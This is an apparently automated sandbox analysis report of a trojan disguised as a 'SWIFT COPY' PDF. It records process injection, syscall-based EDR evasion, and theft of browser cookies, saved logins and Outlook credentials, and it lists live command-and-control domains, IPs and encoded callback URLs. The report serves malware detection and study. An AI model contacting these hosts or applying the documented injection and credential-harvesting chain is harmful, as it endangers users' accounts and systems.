Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00948189 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe protection: read write
Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasautou.exe | Thread register set: target process: 5708
Source: C:\Windows\SysWOW64\rasautou.exe | Thread APC queued: target process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3062008
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095B106 LogonUserW
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00923D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0096411C SendInput,keybd_event
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009674BB mouse_event
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Process created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"
Source: C:\Windows\SysWOW64\rasautou.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: SWIFT COPY 0028_pdf.exe, nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009465C4 cpuid
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0097091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0099B340 GetUserNameW
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00951E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0093DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasautou.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: WIN_81
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: WIN_XP
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: WIN_XPe
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: WIN_VISTA
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: WIN_7
Source: SWIFT COPY 0028_pdf.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00978C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0097923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix, one line per tactic (the number in front of a technique is the count shown for it):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 3 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1559148; Sample: SWIFT COPY 0028_pdf.exe; Startdate: 20/11/2024; Architecture: WINDOWS; Score: 100

• Start: DNS/IP www.optimismbank.xyz, www.aziziyeescortg.xyz, 27 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Antivirus detection for URL or domain, Multi AV Scanner detection for submitted file, 6 other signatures; started SWIFT COPY 0028_pdf.exe (2)
• www.aziziyeescortg.xyz: Performs DNS queries to domains with low reputation
• SWIFT COPY 0028_pdf.exe (2): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; started svchost.exe
• svchost.exe: Maps a DLL or memory area into another process; injected nBMWUKLuWlMJko.exe
• nBMWUKLuWlMJko.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR); started rasautou.exe (13)
• rasautou.exe (13): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures; injected nBMWUKLuWlMJko.exe; started firefox.exe
• nBMWUKLuWlMJko.exe (injected by rasautou.exe): DNS/IP www.housew.website 203.161.46.205, ports 50018, 50019, 50020, VNPT-AS-VNVNPTCorpVN, Malaysia; www.madhf.tech 103.224.182.242, ports 50027, 50028, 50029, TRELLIAN-AS-APTrellianPtyLimitedAU, Australia; 11 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
SWIFT COPY 0028_pdf.exe | 39% | ReversingLabs | Win32.Trojan.AutoitInject |
SWIFT COPY 0028_pdf.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://pepabo.com/ | 0% | Avira URL Cloud | safe |
http://www.aiactor.xyz/g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
http://www.optimismbank.xyz/lnyv/ | 0% | Avira URL Cloud | safe |
http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7P | 0% | Avira URL Cloud | safe |
http://www.tempatmudisini06.click/0kli/ | 0% | Avira URL Cloud | safe |
http://www.sankan-fukushi.info/21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E= | 0% | Avira URL Cloud | safe |
http://www.a1shop.shop/0krx/ | 0% | Avira URL Cloud | safe |
http://www.nonpressure.beauty | 100% | Avira URL Cloud | malware |
http://www.sitioseguro.blog/arvb/ | 0% | Avira URL Cloud | safe |
http://www.questmatch.pro/ipd6/ | 0% | Avira URL Cloud | safe |
http://www.sankan-fukushi.info/21k5/ | 0% | Avira URL Cloud | safe |
http://www.housew.website/4pih/ | 0% | Avira URL Cloud | safe |
http://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
http://www.callyur.shop/hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
http://www.housew.website/4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0= | 0% | Avira URL Cloud | safe |
http://www.grandesofertas.fun/5rfk/ | 0% | Avira URL Cloud | safe |
http://www.callyur.shop/hayl/ | 0% | Avira URL Cloud | safe |
http://www.nonpressure.beauty/ymqd/ | 100% | Avira URL Cloud | malware |
http://www.nuy25c9t.sbs/lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
https://support.lolipop.jp/hc/ja/articles/360049132953 | 0% | Avira URL Cloud | safe |
http://www.conansog.shop/m7wz/ | 0% | Avira URL Cloud | safe |
https://kb.fastpanel.direct/troubleshoot/ | 0% | Avira URL Cloud | safe |
http://www.sitioseguro.blog/arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
http://www.questmatch.pro/ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo= | 0% | Avira URL Cloud | safe |
http://www.aiactor.xyz/g2y0/ | 0% | Avira URL Cloud | safe |
http://www.a1shop.shop/0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
http://www.madhf.tech/vpqb/ | 0% | Avira URL Cloud | safe |
